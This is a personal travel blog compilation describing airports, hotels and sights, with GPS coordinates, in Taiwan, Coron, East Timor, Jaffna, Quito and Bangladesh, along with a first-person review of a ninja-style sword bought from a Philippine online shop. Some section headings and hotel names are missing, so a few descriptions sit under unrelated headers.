TAIWAN IN BRIEF

Taiwan, formerly known as Formosa and officially known as Republic of China, is sovereign state in South East Asia. It is a neighboring country of the Philippines, located just north of Luzon. This island country is about 180 kilometers from the southern coast of mainland China. Terrain is consisting of some flat plains and mostly rugged mountain ranges. Climate is tropical, experiencing a rainy season and hot humid weather. Typhoons are also common between July and October. Currency of Taiwan is the New Taiwan Dollar (TWD ), approximately 31.73TWD/1USD at the time of this writing. Timezone is National Standard Time (UTC+8).

HOW TO GET THERE

There are four major international airports that serves as the gateway to Taiwan by plane. You may select any of these four depending on your place of origin and the intended place to visit in Taiwan.

Taiwan Taoyuan International Airport (IATA: TPE, ICAO: RCTP)
Location: 25° 4′ 35″ N, 121° 13′ 26″ E

This airport is formerly known as Chiang Kai-shek International Airport but it was changed to its current name September of 2006. This airport is one of the two airports that serves the capital city Taipei and the northern part of Taiwan. Taoyuan International Airport serves the vast majority of international flights out of Taipei area. This is the main international hub for China Airlines and EVA Air.

Taipei Songshan Airport (IATA: TSA, ICAO: RCSS)
Location: 25° 04′ 10″ N, 121° 33′ 06″ E

This airport has a combined military and commercial purposes. Military section is known as the Songshan Air Force Base. The section for commercial purposes is officially known as Taipei International Airport. It has flights to South Korea, Japan as well as China.

Taichung Airport (IATA: RMQ ICAO: RCMQ)
Location: 24° 15′ 52.80″ N, 120° 37′ 14.09 ″E

Another airport serving commercial and military airport, this one is located in Taichung. Serving the middle part of Taiwan, it has scheduled flights to Hanoi, Ho Chi Minh, Hongkong and Macau. Charter services to Palau, Japan, South Korea and Thailand are also available.

Kaohsiung International Airport (IATA: KHH, ICAO: RCKH)
Location: 22° 34′ 37″ N, 120° 21′ 00″ E

Being located in the Siaogang District, the airport is also known as Kaohsiung Siaogang Airport. It is a commercial international airport serving the southern part of Taiwan. There are scheduled flights to and from Hongkong, Japan, Macau, South Korea and Vietnam.

WHERE TO STAY

There is a lot of hotels in Taiwan specially in Taipei area. The following hotels suggested are the hotels where I have stayed during my visit.

Le Midi Hotel
Location: 24° 57' 30" N, 121° 13' 12" E

When I stayed on this hotel it is known as Jungli Chinatrust Hotel. They are the highest hotel in the Taoyuan area and provides nice panoramic view of the area. Amenities provided are laundry room and gym on the 28th floor and business center on the 27th floor. Rooms are spacious and clean with great internet connectivity by wifi or the provided LAN cable.

Fullon Hotel Jhongli
Location: 24° 57' 16.2" N, 121° 13' 24.5" E

Fullon Hotel sits right in the business district, even the railway station is a walking distance away. Many establishments are within an easy reach from the hotel. One downside is that because it is located in a busy area, the streets' noise can be heard on some lower rooms. As much as possible pick a room in higher floors.

PLACES TO VISIT
Maokong Gondola
Location: 24° 59' 44.5" N,1 21° 34' 38" E

A very nice cable car ride where you will experience about 30 minutes of panoramic view of Taipei and lush greenery of the Maokong mountain. It is best option to get the Taipei day pass with gondola rides because it offers unlimited rides on the gondola and also the MRT. With this day pass you can enjoy alighting from each and every station of the cable car ride without bothering about the queues for the pass.

Chi Nan Temple
Location: 24° 58' 42.92" N, 121° 35' 12.82" E

While in the gondola, take the time to alight at Zhinan temple station. From there you just have to take a short walk an pass through the long corridor to go to this temple. This taoist temple on the slopes of the Houshan mountain is dedicated to Lu Dongbin its main deity. Lu is said to be dwelling in the southern courtyard of the heavenly court so the temple acts as a compass pointing toward the south or Zhinan on which the temple name was derived.

Zhinan Scenic Area
Location: 24° 58' 45" N, 121° 35' 23.11" E

This scenic area is also accessible from the Zhinan temple station. The location is very good for a relaxing stroll along the hillsides. The trails are paved and shades are provided by the trees and bamboos in the area. There are also several statues depicting the animals of the Chinese zodiac.

Taipei Zoo
Location: 24° 59' 55.49" N, 121° 34' 52.41" E

Taipei zoo is the biggest ever zoo that I have been at the time of this writing. It is so huge that you can spend the whole day if you want to see all the animals that they have. In my opinion, it is best to enter the zoo from the cable car's Taipei Zoo South Station and then from there walk all the way down to the main gate and taking time to pass by and look at all the animals that they have.

2/28 Peace Park
Location: 25° 2' 30.57" N, 121° 30' 53.95" E

This historical municipal park contains the memorials of the victims of the February 28, 1947 incident. Today it offers a peaceful haven for tourists and residents alike. This park is accessible from the MRT NTU Hospital Station. Here you can walk around, do some jogging, join the local folks practicing Tai Chi or Martial Arts, or you can just sit down and relax. You can enjoy watching birds and other wildlife that started to take residence in this peaceful park. The park also features many monuments and installations that you can appreciate.

National Taiwan Museum
Location: 25° 2' 33.91" N, 121° 30' 54.12" E

While you are in 228 Peace Park you can also easily visit the National Taiwan Museum as it is located within the park area. This museum features Taiwan's rich and colorful heritage. They regularly display special exhibits too. For more information, visit the museum's website to see their current featured exhibits.

Meilun Science Park
Location: 25° 5' 51.98" N, 121° 31' 4.88" E

This science park is subdivided into four courts: the court of water which is situated near the road,the court of waves and sounds, the court of math and another court of water. The park features many interactive display that are related to the theme of the court that you are currently on. The park also has a lot of trees with benches in shaded areas that you can sit down and relax.

Taipei Astronomical Museum
Location: 25° 5' 44.98" N, 121° 31' 5.88" E

This astronomical museum located nearby the Meilun science park is composed of three floors of exhibit hall. They also have an IMAX theater, Cosmic adventure ride and a 3D theater. The three floors of exhibit hall features a lot of displays about astronomy, some are also interactive which will help you have a deeper understanding of some astrological or natural phenomenon such as how a tornado is formed. As of the time of this writing, entrance fee to the exhibit hall is NTD40 for adults, the IMAX theater is NTD100, cosmic adventure NTD70 and 3-D theater is NTD100. These fees are affordable and very much worth of the fun and information you will learn. Special discounts are also available for groups, senior citizens and students. It is a highly recommended place to visit.

Taipei 101

Location: 25° 2' 2.05" N, 121° 33' 52.24" E

This landmark skyscraper in Xinyi District of Taipei was formerly known as the Taipei World Financial Center. It was classified as the world's tallest skyscraper back in 2004 and held the title until it was superceded by the Burj Khalifa of Dubai when it was opened in 2010. The Taipei 101 has a total of 101 floors above ground and another five floors underground. With its sheer height, the tower used record holding high speed elevators, top speed reaching about 16.82 meters per second. It only take 35 seconds from the fifth floor up to the observation deck on the 89th floor. The observation deck of the tower provides a panoramic view of Taipei. You can also take a look at the engineering marvel 660 tonnes steel ball suspended inside which serves as the building's wind damper. There is also an outside observation deck in 91st floor equipped with coin operated telescopes. Generally its worth the wait and the expenses. Its an icon of Taiwan so its like an accomplishment badge for a tourist to visit the tower.

Linjiang Street (Tonghua) Night Market

Though I am not so interested with shopping, I was curious to see for myself what is in those night markets. So we went to this place and walked around, looking at all sorts of things for sale and take a closer look at Taiwanese street foods. It's generally a good experience.

Fort Santo Domingo
Location: 25° 10' 31.38" N, 121° 25' 58.37" E

The fort which is strategically located on higher grounds offers a very nice view of the Tamsui river. Beautifully maintained grounds with cool breeze gives a very relaxing ambiance. There are old cannons on display that was used for defense back in the days. Inside the fort buildings they are displaying antique furniture and equipment used before on the site. There is no entrance fee and they have a gift shop where you can purchase souvenir items.

Tamsui Old Street

Location: 25° 10' 10.56" N, 121° 26' 29.51" E

Another must visit place if you're into shopping is the Tamsui old street. This is a very busy area specially during the weekends. There are so many items for shopping. The street has a lot of street food vendors and restaurants. There's also street performers doing their acts and they are quite skillful and entertaining. This is a must part of a tourists' trip to Tamsui area.

Beitou Thermal Valley and Hotsprings
Location: 25° 8' 16.90" N, 121° 30' 41.94" E

This thermal valley is a volcanic crater that is filled with steaming hot and sulfuric natural spring water. Because of its greenish colored water it was given the nickname Jade Spring. Another nickname is Hell Valley which is due to the eerie looking mist from steam that rises from the hot spring. The water in the thermal valley itself can reach up to 100°C which makes it impossible to bathe in it. The surrounding streams in the are which is still hot but already bearable serves as a very relaxing warm water foot bath. There are also a lot of resorts in the area which uses the waters from this valley for their hotspring facilities.

Taoyuan International Baseball Stadium
Location: 25° 0' 0.54" N, 121° 12' 3.25" E

This baseball stadium located in the Taoyuan City has a capacity of 20,000 spectators. This serves as the home of the Lamigo Monkeys, a good baseball team. It is very nice to watch their game as the fans are very lively. I really love the experience of watching the game as there is no dull moments. They even have their own cheering sqaud, the Lamigirls and Lamikids. When a batter scores a homerun there is a burst of fireworks display. And then after the games, there is a 5 minutes fireworks show. This might be only when the home team wins but I'm in luck that when I watch they have won the game. When you are nearby the area, it is worth to visit and watch a game. Even if you are a baseball fan or not, you will surely enjoy it like I do. Check out the website of Lamigo Monkeys for the game schedules. Entrance fee is around NTD600 but it is well worth it.

CORON IN BRIEF

Coron is classified as a first class municipality located in Region 4B (MIMAROPA) in the province of Palawan. The municipality occupies the eastern half of Busuanga Island, all of Coron Island and approximately 50 other small islands including the Canipo Island on the southern end as well as the Tara Island in the northeast. All of these are part of the calamian archipelago in northern Palawan, also known as Calamian group of islands, that separates the west Philippine sea from the Sulu sea.

The name of Coron town originated from Cuyonen term for earthen pot. It was named by Don Nicolas Manlavi Y Ledesma in reference to the shape of the bay fronting their first settlement in Barangay Banuang Daan. Coron has a total land area of 69,247.1460 hectares. It is subdivided into twenty three barangays, nineteen located in mainland and four in nearby islands. Being an island municipality, ships and planes are the main transportation means to and from Manila. Motorized boats, tricycles, jeepneys or trucks transports people and merchandise between barangays and neighboring towns.

HOW TO GET THERE

By plane

Coron is accessible directly from Manila or Cebu City. There are several flights daily from Manila served by AirPhil Express, Cebu Pacific and SkyJet. Cebu Pacific also serves flights from Cebu. The domestic airport serving Coron is the Busuanga airport (IATA Airport Code: USU) also known as Francisco B. Reyes airport. Travel time from Manila to Busuanga airport is approximately 45 minutes to one hour. Direct flight from Cebu is around 40 minutes. Other Cebu flights taking the Cebu-Manila-Busuanga route will take approximately one hour and 40 minutes.

By Sea

Strategically located just outside of town proper, this hotel offers a tranquil place to stay. You will feel closer to nature when you stay in this hotel. The view from the restaurant and roof-deck is very beautiful. The staffs are friendly and very accommodating. The hotel have their own brackish water pool with varying depths of 2ft, 4ft, 6ft and 8ft. Twenty spacious rooms with a balcony or porch are available.

Mt. Tapyas View Deck
Location: 12° 0' 17.55" N, 120° 12' 17.78" E

Mt. Tapyas view deck is one of the popular destinations in Coron. The viewdeck with a height of approximately 214 meters above sea level offers a panoramic view of the town, the sea and neighboring islands. The climb is also quite a good exercise, but it is not that hard as the trail is provided with concrete stairs complete with handrails. The entire trail consists of 621 stair steps, 96 landings, 9 rest stops and 2 path ways. Rest stops are provided with concrete benches where you can relax and do some more stretching. Here's what you need to tackle before each rest stops:

CYC (Coron Youth Club) Beach
Location: 11° 57' 49.78" N, 120° 10' 49.14" E
CYC beach provides white sand beach and very clear water and a large swimming area with gently sloping depths of about 5 to 7ft. It is an ideal place to get yourself accustomed to the snorkel (if its your first time) and also for training first time scuba divers.

Twin Peaks Reef
Location: 11° 57' 38.26" N, 120° 13' 5.35" E

Twin peaks reef is another snorkeling site, so named because two islets marks its location. The area is abundant with marine life that you can easily explore while snorkeling on the water surface.

Hidden Lagoon
Location: 11° 58' 02.51" N, 120° 14' 6.19" E

Hidden lagoon is not so hard to find as it is a part of most island hopping tours offered in Coron. This lagoon has a mixture of saltwater and freshwater flowing into the sea from the mountains. You can feel the cooler freshwater while snorkeling on this area. Although there is no corals, you can still find some fishes specially near the seaweeds.

Isla Bulungan Beach
Location: 11° 58' 02.34" N, 120° 13' 50.02" E

Isla Bulungan's name is a Cuyonen term which translates to "healing place". Indeed, it is a healing place, a place to heal your hungry stomach after snorkeling for hours. This location is usually the mess hall of the island hopping tours. There are nipa hut cottages along the shoreline where the boatmen-guides-cook will serve the food they have prepared themselves.

Calachuchi Coral Eden
Location: 11° 58' 04.16" N, 120° 13' 46.11" E

Calachuchi coral eden stands for its name. The vast array of corals in the area is teeming with marine life. With the coral reef bordering a steep edge of very deep water, there is a probability that you will chance upon a sea turtle while snorkeling.

Kayangan Lake
Location: 11° 57' 28.21" N, 120° 13' 34.09" E

Kayangan lake in the island of Coron is accessible through Coron island cove. Most of the time this cove is labeled in some postcards or online images as Kayangan lake, but actually is just a view from the top of the steep trail going to Kayangan lake. Kayangan lake features a crytal clear brackish water enclosed by mountain walls. The underwater view of rock formations and grayish sediment is a little bit eerie but still snorkeling here is as equally enjoyable as that on the sea.

Sangat Submarine Chaser Wreck

Location: 11° 58' 28.45" N, 120° 04' 46.78" E

The submarine hunter wreck about 40 meters long is inclined on the coral reef a few meters on the east side of the Sangat island. It is a good dive site for wreck diving beginners as well as underwater photography enthusiasts. With the bow of the shipwreck only 3 meters down from, even snorkelers can see it and explore the bow of the ship.

Location: 11° 58' 26.13" N, 120° 01' 44.07" E

Another wreck site that is great for snorkeling and scuba diving alike. With maximum depth of eleven meters, the stern of the ship even appears on the surface during low tide. The shipwreck is already covered with corals and showcases a wide variety of marine life.

Maquinit Hot Spring
Location: 11° 59' 29.15" N, 120° 13' 43.17" E
This hot spring is located approximately 5 kilometers road distance from the town proper. You have to hire a tricycle from town to go to this place. If you have to drive like what I did, take extra precaution as the road is narrow in some places. When you arrive at the location of this hot spring in a mangrove covered rocky hillside area you will feel already relieved of your tiredness. This is the only saltwater hot spring in the Philippines with the water temperature ranging from 32°C to 42°C, hence the name Maquinit which is Cuyonen word for hot. The first time you dip into the saltwater hot spring, you will feel that the water is quite hot but as soon as your body has adjusted you will feel it as very relaxing and soothing. It is advisable to come during late afternoon as the midday sun may make dipping into the hot spring unbearable.

Malbato Chapel
Location: 12° 01' 47.78" N, 120° 06' 52.15" E
Located on a hill overlooking the sea, this chapel is a nice place to visit, not only because of the very relaxing scenery and beautiful architecture of the chapel but the very calm place for prayer and meditation. The chapel is located on the right side of Coron-Busuanga road about 16 kilometers from the town proper.

Kingfisher Park
Location: 12° 01' 33.22" N, 120° 07' 32.11" E
The park is located near the beach and surrounded by mangroves, this makes it an ideal place to enjoy watching local wildlife. The park derived its name to the fact that about six species of kingfisher bird resides in the area. Activities offered by the park are mangrove kayaking, firefly watching at night, hiking up the Lunes Santo mountain as well as trekking to Kaluluwang falls. OTHER THINGS TO DO
Run / Hike
The countryside environment and clean air of Coron is very nice for an early morning run or hike. Aside from the coastal running route offered by the Lualhati park, my favorite is the Governor Drive - National Highway route. This is approximately 4.3 kilometers of paved road ranging from flat to medium steep run.

BRIEF MERCHANT BACKGROUND

This sword is one of the many fine quality sword being sold by Geisha's Blade, an online sword shop which pioneered the selling of Japanese Style sword in the Philippines. Geisha's Blade is the only online sword shop in the country. It is based on Mandaluyong, Metro Manila but they don't have a physical shop. The humble beginnings of Geisha's Blade was rooted on the proprietors' love for Japanese tradition, arts and culture. Being fascinated by the ninjas, I have always dreamed of having a ninja sword of my own. But in the Philippines, it is so hard to get one. The usual swords being sold in the tiangge during town fiesta or in the malls are the samurai swords or katana, popularly known as samurai (although it is a misconception: samurai are the military nobility of medieval and early-modern Japan carrying katanas or samurai sword). Also these off the shelves swords have low quality and will be very dangerous to use in practicing. Then with the help of Google search, I stumbled upon the website of Geisha's Blade. I was really awestruck by their catalog of fine looking swords. But what has attracted me most is this Shinobi Ninja sword. I immediately placed an order and after a few days of waiting in excitement, I lay my hands on my very own Ninja sword.

What I love the most on this sword is the dragon tsuba. The japanese dragons are mostly water deities and associated with rainfall and bodies of water. Being born with the water sign, I feel that I am one with my sword. The tsuba is particularly designed with functionality in mind. This is being used as a foothold in scaling high obstacles. The hole in the tsuba is used to tie a rope in the sword for easy retrieval after climbing on top of the obstacle.

Here are the measurements of my sword. These may vary a little from the specifications provided by Geisha's Blade. They have clearly stated on the notes that sword specifications may vary slightly from sword to sword. For me it is another proof that it is hand forged and not mass produced by machines. The overall length of the blade from the tsuba (hand guard) to the kissaki (point or tip) is 700 mm. Width of the blade at the edge of the habaki (blade collar) is 32mm and then slightly tapering up to the yokote, the width of the blade measured perpendicular to the yokote is 22 mm.

The tsuka (handle) which is made of wood and wrapped in black ray skin and black synthetic silk tsuka ito, has a length of 292 mm from the tsuba to the kashira (pommel). Width of the tsuka with the tsuka ito and samegawa is 32 mm. The saya (scabbard) made of black lacquered lightweight wood is 765 mm in length. The tsuba is rectangular in shape, the length of the side perpendicular to the mune (back edge of the blade) is 70 mm and the other side is 86 mm. The center of gravity of my Shinobi Ninja sword is 122 mm from the tsuba. There is also a bo-hi (grrove) with a width of 7 mm, this gives the sword a nice swishing sound when you swing the sword.

The Shinobi Ninja sword is forged from a 1050 carbon steel. According to AISI (American Iron and Steel Institute), the chemical composition of 1050 carbon steel is as follows:

Iron (Fe) 98.46% to 98.92%
Manganese (Mn) 0.6% to 0.9%
Carbon (C) 0.47% to 0.55%
Sulfur (S) less than or equal to 0.05%
Phosphorous (P) less than or equal to 0.04%

Also based from AISI standard, 1050 carbon steel has a tensile strength of 690 MPa, yield strength of 580 MPa, elastic modulus of 190 to 210 GPa and Brinell hardness of 197. Using a hardness tester, I measured the hardness of my Shinobi Ninja sword and I get a Brinell hardness of 563. This is 2.8 times higher than the AISI standard for 1050 carbon steel.

Because my sword is powder coated, surface roughness test will be irrelevant and will not distinguish metal surface irregularities. But still just to show the quality of the sword finish, I have also tested for surface roughness and got 0.671 micrometer.

BETANO IN BRIEF

Betano is a village located in the southwest of Manufahi District in East Timor. During the former times, Betano was a traditional Timorese kingdom. Local language is Tetum but most locals can understand and speak Bahasa (Indonesian language) as well as Portuguese. Only few locals understand English in Betano area so it is wise to learn a few conversational phrases or better yet bring a local colleague with you.

Local currency being used is the United States Dollar (USD) but they have their own coins. It would be practical to break your hundreds into smaller bills while you are in the capital (Dili) to make it easier to transact while in Betano. No ATM machines are available in Betano as well as in Same, the capital of Manufahi District.

Cellular phone communication is possible as the local provider has roaming agreements with most major cellular phone company of other countries. Because this will cost you much, it is advisable to purchase a local SIM or phone. As of this writing major player is Timor Telecom but there is two new mobile networks coming in to the market, one of which is telkomcel. Internet connection is not available also, but you can go to Timor Telecom sales center in Same where they have wifi connectivity and computer terminals that you can rent. Additionally, you can purchase a USB modem from them to get mobile connectivity. Local time is TLST (UTC +9:00).

HOW TO GET THERE

Primary point of entry to East Timor is trough the Presidente Nicolau Lobato International Airport (IATA Airport Code: DIL). This is located in Dili, the capital of East Timor. Formerly, this airport was known as Comoro International Airport. This airport serves the following airlines: Airnorth (Darwin, Australia - Dili), Air Timor which is being operated by Silk Air (Singapore - Dili), Merpati (Jakarta, Indonesia - Dili) and Sriwijaya Air (Jakarta, Indonesi - Dili).

From Dili it is a six to eight hours of road trip. It is about 140 kilometer of travel up and around the mountains. Travel time mostly depends on weather, road conditions and driver's ability. There is also an airstrip near Same about 24 kilometers from Betano. But there are no regular flights to this airstrip. You have to arranged chartered flight from Dili on which availability will depend also on the weather conditions.

Beach Side Hotel, Dili

This hotel is about thirteen kilometers from the airport. It is located right on the beach front of Branca beach hence its name. Facilities are okay and you can always have a relaxing drink by the beach or take a swim at the warm water. They don't have wifi or wired internet connection so it's good if you have the local USB modem.

The Christo Rei, quite similar to the one in Rio de Janeiro is just a walking distance from this hotel. It is very nice to go jogging to the statue during the morning. For more information about this hotel, visit their website here.

This hotel is located also near the beach and about eleven kilometers from the airport. It is also conveniently located near some restaurants. Room is average sized but I really love the soft king sized bed as well as the pillows. They also provide a wired internet in the rooms. Their restobar is elevated and provides a wonderful sunset view of the beach.

Umaliurai Hotel, Same

Location: 9° 01' 10.78" S, 125° 39' 11.26" E

This hotel is located in Same, about twenty two kilometers from Betano. I would say that this hotel is the best in the entire Same area. But you have to consider that this is not the same quality as with those you can find in Dili. They have a standby generator but they only run it until eleven in the evening, so if power does not come back during that time, you have to sleep in total darkness. There are airconditoned rooms and some are provided with a ceiling fan but for me its not so important as nights are quite cold in this location. They also don't have any wifi or internet connection. Warm water for bath is available when there is electricity. The best here is the food. I would say they have the best food quality in Same.

This is a family run business. The owner of this hotel is a very kind Australian man who have married a Timorese. They are very hospitable and makes you feel home away from home.

PLACES TO VISIT

There is not much in particular to visit in Betano. It's more of an eco tourism site. You can go around the town and enjoy the beauty of nature. Betano's beach is also very beautiful. But be wary that the mangroves near these beaches are home to the salt water crocodiles. From time to time they can wander to the beaches. These can give you also the chance to observe a crocodile in its natural habitat. Just make sure to watch it from a distance.

The six hour travel to Betano is in itself a very rewarding experience. The road goes trough the mountains wherein you can see some small waterfalls. Most of the time the roads are foggy and temperature are a bit cold. At the highest point of the trip you will be rewarded with a majestic view of towns below. The rolling hills of green grass is also very refreshing to look at.

JAFFNA IN BRIEF

Jaffna is the capital city of Northern Province of Sri Lanka. Amusingly, the city is located within the district of Jaffna which is located in Jaffna Peninsula. As of today, the city is 12th largest in the country. The civil war in this area has ended just in 2009 but the city is recovering so fast. Most infrastructure has already been rebuilt and continually improved by the government.

Majority of Jaffna population are Sri Lankan Tamils thus, the common language used in the area is Tamil which is different from Sinhala used in the rest of the country. But Tamil as well as Sinhala are the official languages of Sri Lanka.

Local currency is Sri Lankan Rupee (LKR), 1 USD is approximately equal to 127.25 LKR as of the time of this writing. The place is also tourist friendly as there are many money exchange shops and banks with ATM which accepts international cards. American Express credit card is also widely accepted, but it is advisable to take extra caution when using credit cards as some foreign scammers have been caught operating in Sri Lanka recently. Timezone is SLST (UTC +5:30).

HOW TO GET THERE

Though there is an international airport located in Jaffna, the Jaffna International Airport (IATA Airport Code: JAF), it is not serving any international flight as of the moment. The entrypoint to the country is the Bandaranaike International Airport (IATA Airport Code: CMB). Many international airlines are operating from this airport. This airport is located about 35 km north of Colombo.

By March 18, a new international airport will open in Hambantota, the Mattala Rajapaksa International Airport (IATA Airport Code: HRI). This is also known as Hambantota International Airport.

The location of the hotel which is within the central business district of Colombo is quite an advantage. Being at the side of the Beira lake also offers a fresh breeze whenever you are relaxing in the poolside. They have a lot of facilities and many different room category to choose from. From Cinnamon Lakeside, the approximately 400 km travel to Jaffna by car will take about 10 hours, taking into consideration the rest stops and the speed limits. In Colombo and main towns maximum speed for cars is 50 kph and 70 kph on rural areas.

This hotel is located near the central business area of Jaffna. Sitting right next to the post office, the hotel is easy to find. Another advantage is that the Jaffna Fort is just a walking distance from the hotel. PLACES TO VISIT

There are a lot of beautiful places and beaches to visit in Jaffna, but due to time constraints I only managed to visit one. Actually, the Tilko city hotel offers a Jaffna day tour, just inquire on the hotel lobby if you want to avail of this. And also, the travel to Jaffna by car from Colombo is also a rewarding experience. We pass by the national reserve and you can also see many temples and historical monuments along the way.

Jaffna Fort

Location: 9° 39' 43.14 N, 80° 0' 30.13 E

Jaffna fort was built around 1618 by the Portuguese following their invasion of Jaffna. The fort's design was based on the star fortification design which enables active defensive capability. In 1658, it was then captured by the Dutch and they have expanded the fort. But, when the British came over, they have taken the fort and garrisoned unitl 1948.

Being a large military fort, it was used by the Tamil Tigers during the civil war. They have stationed here from 1986 to 1995 until it was recaptured by the Sri Lanka Army in 1995 after a siege that last for fifty days under the Operation Riviresa.

Today, it was used as a detachment of the Sri Lankan army and renovations are ongoing. Visitors are welcome but with limited access only. The roads surrounding the fort is a very nice location for running enthusiasts. According to my running app, the route (Circular Road - Point Pedro - Kankesanturai Road - KKS Road) is about two kilometers. They also have developed the sidewalk along the lagoon to make it more strolling friendly.

QUITO IN BRIEF

Quito is the capital city of Ecuador and it is formerly known as San Francisco De Quito. With its location at 2800 meters above sea level, it is considered as the highest capital city in the world. Aside from being the country's capital, it is also the capital of the province of Pichincha. Despite the high altitude and being on the slope of an active stratovolcano also named Pichincha, Quito is the second most populous city of Ecuador.

The currency being used in Quito and the whole country is United States Dollars (USD). Timezone is ECT (UTC-5). The languange being used is Spanish but most can understand English as well.

HOW TO GET THERE

The main entry point to the country is also located in Quito as it is the capital city. But other airlines use the Guayaquil airport. Mariscal Sucre International Airport (IATA Airport Code: UIO) is the city's principal airport. It is located at a convenient driving distance of just about 10 kilometers from the city's center. A new airport outside the city limits is being built to replace this one as its current location near the high buildings makes landings quite hard at night and during foggy weather conditions.

One advantage of this hotel is that it is located in the financial and business center of the capital. The rooms are spacious and provided with the standard amenities that most hotels provide. For fitness conscious guests, they also have a gym located at the Penthouse and provides a relaxing view of the city while you are working out or running on the treadmill. If you also fancy running outside, Parque La Carolina with a large track oval is just a walking distance from the hotel.

PLACES TO VISIT

Quito, being declared by UNESCO in 1978 as one of the first World Cultural Heritage Sites, has many historic places. Most of these are least altered and well preserved locations. Below are some of the must visit locations while you are in Quito.

Vasilica Del Voto National (Basilica of the National Vow)

Location: 0° 12' 53.98" S, 78° 30' 26.64" W

This is a Roman Catholic church that is situated in the historic center of Quito. It is also known as Basilica de San Juan or Cathedral de Consagracion de Jesus. The construction of the Basilica has started in 1887 and until now it is still considered technically as unfinished. Donations by visitors (in the form of access tickets) and believers helps to continue the construction of the Basilica. Local urban legend states that when the Basilica is finished, the end of the world will come.

The Basilica is considered as the most important work of Neogothic Ecuadorian architecture. This is visible in the architectural design featuring grotesques in the form of the native Ecuadorian animals like iguana, tortoises and armadillos. Dimension of the Basilica is 140 meters in length and 35 meters width. The height depends on the different points of the Basilica. It is 115 meters in the frontal towers, 74 meters in the transept, 30 meters in the sanctuary and 15 meters in the votive chapels. Visitors are allowed to climb to the top of the towers even up to the bell tower where there is a panoramic view of the city and its surrounding mountains. Ticket price is USD $3 for foreign tourists and USD $1 for locals (at the time of this writing).

Ciudad Mitad del Mundo (Middle of the World City)

Location: 0° 0' 8" S, 78° 27' 21" W

This location is like a park where a monument was constructed to mark the location of the equatorial line. Location is conveniently located north of center of Quito. You can also find here the Museo Etnografico Mitad Del Mundo which features the indigenous ethnography of Ecuador.

The monument with a height of about 30 meters was constructed between 1979 and 1982 to replace the older and smaller marker built by the Ecuador Government under the direction of a geographer named Luis Tufiño in 1936. The older monument was built to commemorate the first Geodesic Mission of the French Academy of Sciences which is led by Pierre Bouguer, Charles Marie de La Condamine and Louis Godin. This monument is now located in a town called Calacali, about 7 kilometers away from this location.

The new monument which is pyramidal in shape is topped by a globe that is about 2.25 meter in radius and weighs about 5 tons. Each side of the monument is facing a cardinal direction. Inside you can find a small museum with displays of indigenous items pertaining to Ecuadorian culture and a miniature model of the park.

There is also a planetarium which displays the instruments used by the Geodesic mission in calculating the location of the equatorial line. Based on World Geodetic System WGS84 used on modern GPS systems and other GIS products like Google Earth, the actual equatorial line is about 240 meters north of the marked line calculated by the mission. Considering the equipment they have used on that time, the 240 meters error is still quite impressive.

Other attractions are insectarium, restaurants and diverse selection of local handicraft stores and local food served at several cafes and restaurants. During weekends, the central plaza also hosts various cultural and musical events for the tourists.

Intiñan Solar Museum
Location: 0° 0' 2.76" S, 78° 27' 16.37" W

Intiñan solar museum is a private attraction located at about 200 meters north east of the Ciudad Mitad del Mundo monument. They are claiming that their marked line is the true location of the equator though my GPS (a civilian GPS, accuracy of about 2 meters at the time of measuring) says otherwise and the location itself on google map is outside the 0° 0' 0" line.

The museum has English speaking tour guides and the information they provide about the ancestral culture of Ecuador is quite exceptional. They also perform experiments that they claim to be only possible near the equatorial line. It is kind of fun and amusing but I will not be very skeptic about it. What is important is that I enjoy their presentation. But if you are interested, you can do some research about this. What I enjoy the most is attempting to balance an egg on its end on a head of a nail. If you manage to do so, a certificate will be given to you. Also bring your passport with you because they also stamp it with a commemorative stamp.

They demonstrate what they claim the coriolis effect on the rotation of water down the drain depending on the location with reference to the equatorial line. Though coriolis effect is true, it is just significant on macro scale. Rotation of water down the drain is much affected by the direction it enters the vessel. (See the video below)

Location: 0° 1' 23.94" N, 78° 28' 51.84" W

About 1.5 kilometer from Intiñan Solar Museum is another museum that features the rich culture of Ecuadorian art. The building's architecture and interior design will make you feel like you were in some kind of archaeological site. What my driver told me is that this museum was created by the initiative of an Ecuadorian artist named Christopher Ortega. Visit the artist's webpage for more information about him and the museum.

Reserva Geobotánica Pululahua (Pululahua Geobotanical Reserve)

Location: 0° 1' 31.34" N, 78° 28' 59.50" W

Located just 500 meters from Templo del Sol it is also practical to visit this place. This is a protected area around Pululahua volcano just 17 kilometers north of Quito. The volcano's crater is visible from this spot. This crater is one of only few in the world with human inhabitants. The view is exhilarating and the soft breeze will surely relax. I recommend this stop before the drive back to the city.

BANGLADESH IN BRIEF

Bangladesh is officially known as People's Republic of Bangladesh and located in South Asia. It is on the Bengal region of the eastern Indian sub continent. The name of the country means "Country of Bengal" in their official language which is Bengali. Neighboring countries are Burma (Myanmar) and India.

The currency being used by Bangladesh is Taka (BDT), approximately $0.0123 USD. Timezone is BST (UTC +6). They drive on the left side of the road and traffic jams are normal everyday sight specially if you are on the cities. Concentration of heavy traffic is noticeable in their capital city, Dhaka. It is advisable to give about 2 hours allowance for travel if you are going out for business meetings.

HOW TO GET THERE

Main gateway to the country is Dhaka through Shahjalal International Airport although other airlines use Chittagong and Sylhet as the point of entry. Please check wikitravel's information about travelling to Bangladesh for more details.

Quite nice hotel that sits right in the center of Dhaka. It is also near the Shahjalal International Airport. They provide limousines to fetch you from the airport and also to send you there when you leave. Visit their homepage for more details.

I have stayed here for a total of 167 days and I can say that the service is quite good. Amenities are also okay. They have olympic sized swimming pool and another pool for the kids. They also have a lot of gym equipments. The gym also has a sauna and a jacuzzi. I can also say that they are thoughtful. On the day of my birthday, I'm surprised to find a cake, birthday card and a bouquet of fresh flowers (my first time since I'm a guy) in the living area my room.

They also offer a loyalty card that is accepted by hotels and other partners of GHA (Global Hotel Alliance). Because I have stayed already for 167 days, I am now a holder of their black card. And I am entitled to 2 local experience awards that can be redeemed at any Pan Pacific hotel or their partners.

Location: 23° 47' 35.85" N, 90° 24' 16.44" E
A five star hotel that is situated in the middle of Dhaka's central business district. Many offices and establishments are just a few minutes walk away from the hotel. They also have a gym but the number of equipments are quite limited. But the panoramic view of Dhaka from the gym is nice to look at while you are running on the treadmill. An outdoor pool is also available but its freezing cold during the winter season as they don't have a heater for it. For more details, visit their website.

Hotel Castle Salam, Khulna
Location: 22° 48' 35.51" N, 89° 33' 44.81" E
This hotel is also nice and strategically located in Khulna's central business district. It is also near the worlds largest mangrove forest and many other tourist destinations in this division. They have spacious rooms and food are also affordable. They have a recreation room where you can play billiards. There is also a pool but it is quite small for me and it looks like it was not maintained at the time of my visit. Visit their wesbite for more details.

Peninsula Hotel, Chittagong
